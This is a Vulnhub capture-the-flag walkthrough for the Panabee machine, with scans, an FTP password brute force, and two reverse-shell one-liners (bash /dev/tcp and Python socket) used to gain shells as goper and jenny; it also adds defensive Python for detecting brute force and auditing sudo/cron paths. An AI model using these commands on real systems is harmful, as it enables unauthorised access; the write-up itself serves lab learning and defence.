Vulnhub Panabee machine: detailed walkthrough




Panabee

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH
 192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH

Using Kali Linux's netdiscover, the target host's IP address is identified as 192.168.56.228.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
Nmap scan report for bogon (192.168.56.228)
Host is up (0.00011s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
|   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
|_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after:  2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
Service Info: Host: panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2023-03-23T11:21:52
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ smbclient //192.168.56.228/note
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 14 23:08:42 2020
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

                20508240 blocks of size 1024. 12823536 blocks available
smb: \> get note.txt
getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> put test.txt
putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
  .                                   D        0  Thu Mar 23 07:23:20 2023
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  test.txt                            A       12  Thu Mar 23 07:23:20 2023
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

                20508240 blocks of size 1024. 12823528 blocks available

Files can be uploaded through the SMB share.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat note.txt
Dear goper,

I'll just leave it here as a note, Sorry for the late response, The server will now `backup` you files in your home dir, go ahead and backup anything you like, server will do it for you.

Please delete this note once you've read for security measure

Is goper a username?

Is there a scheduled task running (a periodic backup of the files)?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ nikto -h http://192.168.56.228
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.228
+ Target Hostname:    192.168.56.228
+ Target Port:        80
+ Start Time:         2023-03-22 23:25:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

Directory scanning turned up nothing, so the next step is to brute-force the password with hydra.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.228:21/
[21][ftp] host: 192.168.56.228   login: goper   password: spiderman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||8003|)
150 Here comes the directory listing.
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..
-rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 Jun 14  2020 .cache
drwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
-rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor
-rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful
-rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo
-rw-r--r--    1 0        1000          332 Jun 15  2020 status.py
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||59411|)
150 Opening BINARY mode data connection for status.py (332 bytes).
100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA
226 Transfer complete.
332 bytes received in 00:00 (2.23 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13323|)
150 Ok to send data.
100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (8.87 KiB/s)
ftp>
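The hydra run above is a textbook online password-guessing burst: one username, thousands of failed logins from a single client inside a minute, then a successful login. vsftpd records every attempt in its own log, so this pattern is easy to catch on the server side. The following detector is an added example, not part of the original write-up; it assumes the vsftpd.log line format `Wed Mar 22 23:38:08 2023 [pid N] [user] FAIL LOGIN: Client "ip"` (the sample log lines are constructed to match that format, not copied from the box) and raises two kinds of alert: a failure burst from one client, and a success that follows such a burst, which is the event that actually matters.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# Assumed vsftpd.log format (log_ftp_protocol / dual_log_enable), one line per attempt:
#   Wed Mar 22 23:38:08 2023 [pid 4242] [goper] FAIL LOGIN: Client "192.168.56.146"
LOG_LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)
TS_FORMAT = "%a %b %d %H:%M:%S %Y"

Alert = Tuple[str, str, str]  # (client ip, alert kind, detail)


def detect_bruteforce(lines, threshold: int = 10,
                      window: timedelta = timedelta(seconds=60)) -> List[Alert]:
    """Flag clients with >= threshold failed FTP logins inside a sliding window, and a
    successful login that arrives while such a burst is still in the window (a guessed
    password). Lines that are not login events are ignored."""
    recent_fails: Dict[str, Deque[datetime]] = defaultdict(deque)
    already_flagged = set()
    alerts: List[Alert] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # CONNECT, UPLOAD, ... lines are not login attempts
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        ip, user, result = m["ip"], m["user"], m["result"]
        q = recent_fails[ip]
        while q and ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold and ip not in already_flagged:
                already_flagged.add(ip)
                alerts.append((ip, "bruteforce",
                               f"{len(q)} failed logins within {int(window.total_seconds())}s"))
        elif len(q) >= threshold:
            alerts.append((ip, "success-after-failures",
                           f"user {user} logged in after {len(q)} recent failures"))
    return alerts


def make_sample_log() -> List[str]:
    """Constructed sample: one mistyped password from a workstation (benign), then a
    12-attempt burst from 192.168.56.146 that ends in a successful login, i.e. the
    shape hydra leaves behind."""
    def entry(t: datetime, pid: int, user: str, result: str, ip: str) -> str:
        return (f'{t.strftime(TS_FORMAT)} [pid {pid}] [{user}] '
                f'{result} LOGIN: Client "{ip}"')

    base = datetime(2023, 3, 22, 23, 38, 8)
    lines = [
        entry(base - timedelta(minutes=5), 4101, "goper", "FAIL", "192.168.56.1"),
        entry(base - timedelta(minutes=5) + timedelta(seconds=8), 4102, "goper", "OK", "192.168.56.1"),
    ]
    for i in range(12):
        lines.append(entry(base + timedelta(seconds=2 * i), 4200 + i,
                           "goper", "FAIL", "192.168.56.146"))
    lines.append(entry(base + timedelta(seconds=30), 4300, "goper", "OK", "192.168.56.146"))
    return lines


if __name__ == "__main__":
    for ip, kind, detail in detect_bruteforce(make_sample_log()):
        print(f"{ip:16} {kind:24} {detail}")
```

On a real host, feed `open("/var/log/vsftpd.log")` to `detect_bruteforce`; the sliding window keeps memory bounded per client, and the single benign typo from 192.168.56.1 stays below the threshold so it produces no alert. Rate-limiting at the service (vsftpd's `max_per_ip`, or fail2ban on the same log) removes the burst before it succeeds; this detector is for seeing it after the fact.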

The FTP root appears to be goper's home directory, so an SSH public key can be uploaded to the target.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in goper
Your public key has been saved in goper.pub
The key fingerprint is:
SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|      . =Xo.     |
|     .o += +     |
|    .o +oo++ o   |
|    o+.+o+oE.=oo |
|  .oo+ooo.S o.==.|
|  ....+ . =.oo   |
|     . . +.      |
|        ..       |
|        ..       |
+----[SHA256]-----+

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ls
goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt

ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||34675|)
150 Ok to send data.
100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (0.98 MiB/s)
ftp>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh -i goper goper@192.168.56.228
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
goper@192.168.56.228: Permission denied (publickey).

But the target rejects the key-based login, so this route does not work.

Next, write a bash script and upload it over FTP, i.e. into goper's home directory, to see whether it gets executed automatically.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat shell.sh
bash -i >& /dev/tcp/192.168.56.146/5555 0>&1

The script has to be named backup.sh before cron will execute it.

ftp> put backup.sh
local: backup.sh remote: backup.sh
229 Entering Extended Passive Mode (|||10215|)
150 Ok to send data.
100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA
226 Transfer complete.
57 bytes sent in 00:00 (45.43 KiB/s)

└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
bash: cannot set terminal process group (3520): Inappropriate ioctl for device
bash: no job control in this shell
goper@panabee:~$ pwd
pwd
/home/goper
goper@panabee:~$ ls -alh
ls -alh
total 72K
drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh
-rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history
-rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrc
drwx------ 2 goper goper 4.0K Jun 14  2020 .cache
drwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local
-rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile
-rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor
-rw------- 1 goper goper   57 Mar 23 11:54 shell.sh
drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py
-rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful
-rw------- 1 goper goper   12 Mar 23 11:40 test.txt
-rw------- 1 goper goper  11K Jun 15  2020 .viminfo
goper@panabee:~$ sudo -l
sudo -l
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py

The existing status.py can be deleted and a Python reverse-shell script uploaded over FTP in its place, which yields a shell as jenny.
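Both footholds on this box come from the same misconfiguration: a privileged principal (cron for backup.sh, sudo-as-jenny for status.py) executes a file that sits in a directory goper owns. status.py being root-owned and read-only does not help, because goper owns /home/goper and can simply unlink and replace it. The audit below is an added example written for this write-up, not code from the original post or from the box; it walks a sudo rule's or cron job's target path and every ancestor directory, and reports any that an untrusted uid owns or can write. The filesystem it runs against is a constructed stand-in (`PANABEE_FS`, transcribed from the listings above, uid 1000 = goper), injected through the `lstat` parameter so the example runs offline; with the default `lstat=os.lstat` it audits the real host. The same group-writable home directory (`drwxrwxr-x goper ftp`) is, in my reading, also why sshd refused the uploaded authorized_keys: its default StrictModes rejects a home directory that is group- or world-writable.

```python
import os
import re
import stat
from types import SimpleNamespace
from typing import Callable, Dict, List, Tuple

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def _entry(uid: int, mode: int, is_dir: bool = False) -> SimpleNamespace:
    """Minimal stand-in for an os.stat_result (only the fields the audit reads)."""
    kind = stat.S_IFDIR if is_dir else stat.S_IFREG
    return SimpleNamespace(st_uid=uid, st_mode=kind | mode)


# Constructed replica of the relevant part of the Panabee filesystem, transcribed from
# the directory listings in the write-up (uid 0 = root, uid 1000 = goper).
PANABEE_FS: Dict[str, SimpleNamespace] = {
    "/": _entry(0, 0o755, True),
    "/home": _entry(0, 0o755, True),
    "/home/goper": _entry(1000, 0o775, True),      # drwxrwxr-x goper ftp
    "/home/goper/status.py": _entry(0, 0o644),     # -rw-r--r-- root  goper
    "/home/goper/backup.sh": _entry(1000, 0o711),  # -rwx--x--x goper goper
    "/usr": _entry(0, 0o755, True),
    "/usr/bin": _entry(0, 0o755, True),
    "/usr/bin/python3": _entry(0, 0o755),
}

# Constructed from the `sudo -l` output shown in the write-up.
SUDO_L_OUTPUT = """\
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py
"""


def fake_lstat(path: str) -> SimpleNamespace:
    """lstat() over the constructed tree; raises FileNotFoundError like the real call."""
    try:
        return PANABEE_FS[os.path.normpath(path)]
    except KeyError:
        raise FileNotFoundError(path) from None


def audit_path(path: str, trusted_uids: Tuple[int, ...] = (0,),
               lstat: Callable = os.lstat) -> List[str]:
    """Findings for a file that sudo or cron executes with another principal's rights.
    The file must be owned by a trusted uid and not be writable by others, and so must
    every directory above it: whoever owns or can write an ancestor can unlink and
    replace the file however tight the file's own mode is."""
    findings: List[str] = []
    try:
        st = lstat(path)
    except OSError:
        findings.append(f"{path}: does not exist (stale entry, or already removed)")
        st = None
    if st is not None:
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{path}: is a symlink; audit its target as well")
        if st.st_uid not in trusted_uids:
            findings.append(f"{path}: owned by untrusted uid {st.st_uid}")
        if st.st_mode & WRITABLE_BY_OTHERS:
            findings.append(f"{path}: writable by group/others")
    d = os.path.dirname(os.path.normpath(path))
    while True:
        try:
            dst = lstat(d)
        except OSError:
            findings.append(f"{d}: directory missing")
            break
        if dst.st_uid not in trusted_uids:
            findings.append(f"{d}: directory owned by untrusted uid {dst.st_uid}")
        elif dst.st_mode & WRITABLE_BY_OTHERS and not dst.st_mode & stat.S_ISVTX:
            findings.append(f"{d}: directory writable by group/others (no sticky bit)")
        parent = os.path.dirname(d)
        if parent == d:  # reached "/"
            break
        d = parent
    return findings


# One "(runas) [NOPASSWD:] command args" line from the user-specification part of sudo -l.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>.+?)\s*$")


def parse_sudo_l(output: str) -> List[Tuple[str, List[str]]]:
    """Extract (runas, argv) pairs from `sudo -l` output."""
    return [(m["runas"].strip(), m["cmd"].split())
            for m in map(SUDO_RULE.match, output.splitlines()) if m]


def audit_sudo_rules(output: str, trusted_uids: Tuple[int, ...] = (0,),
                     lstat: Callable = os.lstat) -> Dict[str, List[str]]:
    """Audit every absolute path in each rule's argv: the interpreter and the script."""
    report: Dict[str, List[str]] = {}
    for runas, argv in parse_sudo_l(output):
        for arg in (a for a in argv if a.startswith("/")):
            hits = audit_path(arg, trusted_uids, lstat)
            if hits:
                report.setdefault(f"({runas}) {' '.join(argv)}", []).extend(hits)
    return report


if __name__ == "__main__":
    for rule, hits in audit_sudo_rules(SUDO_L_OUTPUT, lstat=fake_lstat).items():
        print(rule, *hits, sep="\n  ")
    print("cron target:", *audit_path("/home/goper/backup.sh", lstat=fake_lstat), sep="\n  ")
```

The fix the audit points at is the usual one: scripts that run as another user belong in a root-owned directory such as /usr/local/sbin (or /etc/cron.d for cron), not in the invoking user's home, and the sudo rule should name that path. Passing `trusted_uids=(0, 1000)` shows the secondary problem the same tree has: even if goper were trusted, the home directory is group-writable by the ftp group, which the audit reports separately.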

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ vim status.py

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

goper@panabee:~$ rm -rf status.py
rm -rf status.py

ftp> put status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||26655|)
150 Ok to send data.
100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA
226 Transfer complete.
232 bytes sent in 00:00 (167.32 KiB/s)
ftp>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
goper@panabee:~$ chmod 777 status.py
chmod 777 status.py
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
jenny@panabee:/home/goper$ cd /home
cd /home
jenny@panabee:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root  root  4.0K Jun 15  2020 .
drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..
drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goper
drwx------  3 jenny jenny 4.0K Jun 15  2020 jenny
jenny@panabee:/home$ cd jenny
cd jenny
jenny@panabee:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jenny jenny 4.0K Jun 15  2020 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history
-rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc
-rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst
-rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile
-rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt
-rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jenny
drwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0

From .bash_history we learn that there is a secret.zip file; it was downloaded to the local Kali Linux machine.

Cracking it failed, however; privilege escalation on this machine goes through the .tmux directory instead.

Privilege escalation

cd /root
# ls -alh
ls -alh
total 80K
drwx------  5 root root 4.0K Jun 30  2020 .
drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root  18K Jun 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwx------  2 root root 4.0K Jun 14  2020 .cache
-rw-------  1 root root   38 Jun 30  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 14  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root  239 Jun 15  2020 proof.txt
-rw-r--r--  1 root root   66 Jun 15  2020 .selected_editor
drwx------  2 root root 4.0K Jun 14  2020 .ssh
-rw-------  1 root root  13K Jun 21  2020 .viminfo

 __   __        __   ___  ___
|__) /\  |\ |  /\  |__) |__  |__
|    /~~\ | \| /~~\ |__) |___ |___

